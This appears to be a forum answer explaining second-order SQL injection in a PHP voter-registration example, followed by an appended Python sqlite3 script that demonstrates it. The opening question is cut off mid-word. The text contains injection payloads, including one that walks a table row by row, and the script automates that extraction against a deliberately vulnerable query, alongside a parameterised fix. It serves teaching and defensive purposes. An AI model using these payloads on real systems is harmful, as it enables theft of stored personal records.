So I've been trying to replicate a second order SQL Injection. Here's an example template of two PHP based sites that I've prepared. Let's just call it a voter registrat
Using a first name of:
' OR 1 OR '
This will produce a where clause in the second SQL of
WHERE FirstName = '' OR 1 OR ''
Therefore the result will be the first record in the table.
By adding a LIMIT clause, you can extract all rows from the table with:
' OR 1 ORDER BY UserID ASC LIMIT 0, 1 --
Obviously it will only extract 1 row at a time, so you would need to repeat that and increment the 0 in the LIMIT. This example uses a comment -- to terminate the remaining SQL, which would otherwise cause the query to fail because it would add a single quote after your LIMIT.
The above is a simple example, a more complex attack would be to use a UNION SELECT which would give you access to the entire DB through the use of information_schema.
Also, you are using addslashes() in one of your queries. That is not as secure as mysql_real_escape_string(), and in turn escaping quotes with either is not as secure as using prepared statements or parameterised queries, for example in PDO or MySQLi.
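The mechanism the answer describes, as an added example that is not part of the original question or answer: a first query stores the name with a parameterised INSERT (so the payload survives intact), a second query later trusts the stored value and concatenates it into a WHERE clause, and the LIMIT offset is incremented to walk the whole table one row at a time. It uses Python's sqlite3 in-memory database instead of PHP and MySQL, with constructed sample voters and the assumed table and column names voters, UserID, FirstName, LastName and registrations. The safe lookup at the end binds the stored value as a parameter and returns nothing for the same payload.

```python
import sqlite3

# Constructed sample data; not from the original post.
VOTERS = [
    (1, "Alice", "Smith"),
    (2, "Bob", "Jones"),
    (3, "Carol", "White"),
]


def setup_db():
    """Assumed schema: a voters table and a registrations table that stores submitted names."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE voters (UserID INTEGER PRIMARY KEY, FirstName TEXT, LastName TEXT)"
    )
    conn.executemany("INSERT INTO voters VALUES (?, ?, ?)", VOTERS)
    conn.execute("CREATE TABLE registrations (RegID INTEGER PRIMARY KEY, FirstName TEXT)")
    return conn


def register(conn, first_name):
    """First query (the registration form): parameterised, so the raw payload is stored verbatim."""
    cur = conn.execute("INSERT INTO registrations (FirstName) VALUES (?)", (first_name,))
    return cur.lastrowid


def stored_first_name(conn, reg_id):
    (name,) = conn.execute(
        "SELECT FirstName FROM registrations WHERE RegID = ?", (reg_id,)
    ).fetchone()
    return name


def lookup_vulnerable(conn, reg_id):
    """Second query: trusts the stored value and concatenates it, which is the second-order bug."""
    name = stored_first_name(conn, reg_id)
    sql = (
        "SELECT UserID, FirstName, LastName FROM voters WHERE FirstName = '" + name + "'"
    )
    return conn.execute(sql).fetchall()


def lookup_safe(conn, reg_id):
    """Same second query with the stored value bound as a parameter."""
    name = stored_first_name(conn, reg_id)
    return conn.execute(
        "SELECT UserID, FirstName, LastName FROM voters WHERE FirstName = ?", (name,)
    ).fetchall()


def dump_all_rows(conn):
    """Walk the voters table one row per registration by incrementing the LIMIT offset.

    The trailing -- comments out the closing quote the vulnerable query appends.
    """
    rows = []
    offset = 0
    while True:
        payload = f"' OR 1 ORDER BY UserID ASC LIMIT {offset}, 1 --"
        reg_id = register(conn, payload)
        result = lookup_vulnerable(conn, reg_id)
        if not result:
            break  # past the last row
        rows.append(result[0])
        offset += 1
    return rows


if __name__ == "__main__":
    db = setup_db()
    for row in dump_all_rows(db):
        print(row)
    rid = register(db, "' OR 1 OR '")
    print("vulnerable:", lookup_vulnerable(db, rid))  # every voter
    print("safe:", lookup_safe(db, rid))  # no match
```

One caveat when moving this from SQLite to MySQL: MySQL only treats -- as a comment when it is followed by whitespace, so the payload needs a trailing space (or use # instead) for the appended quote to be discarded.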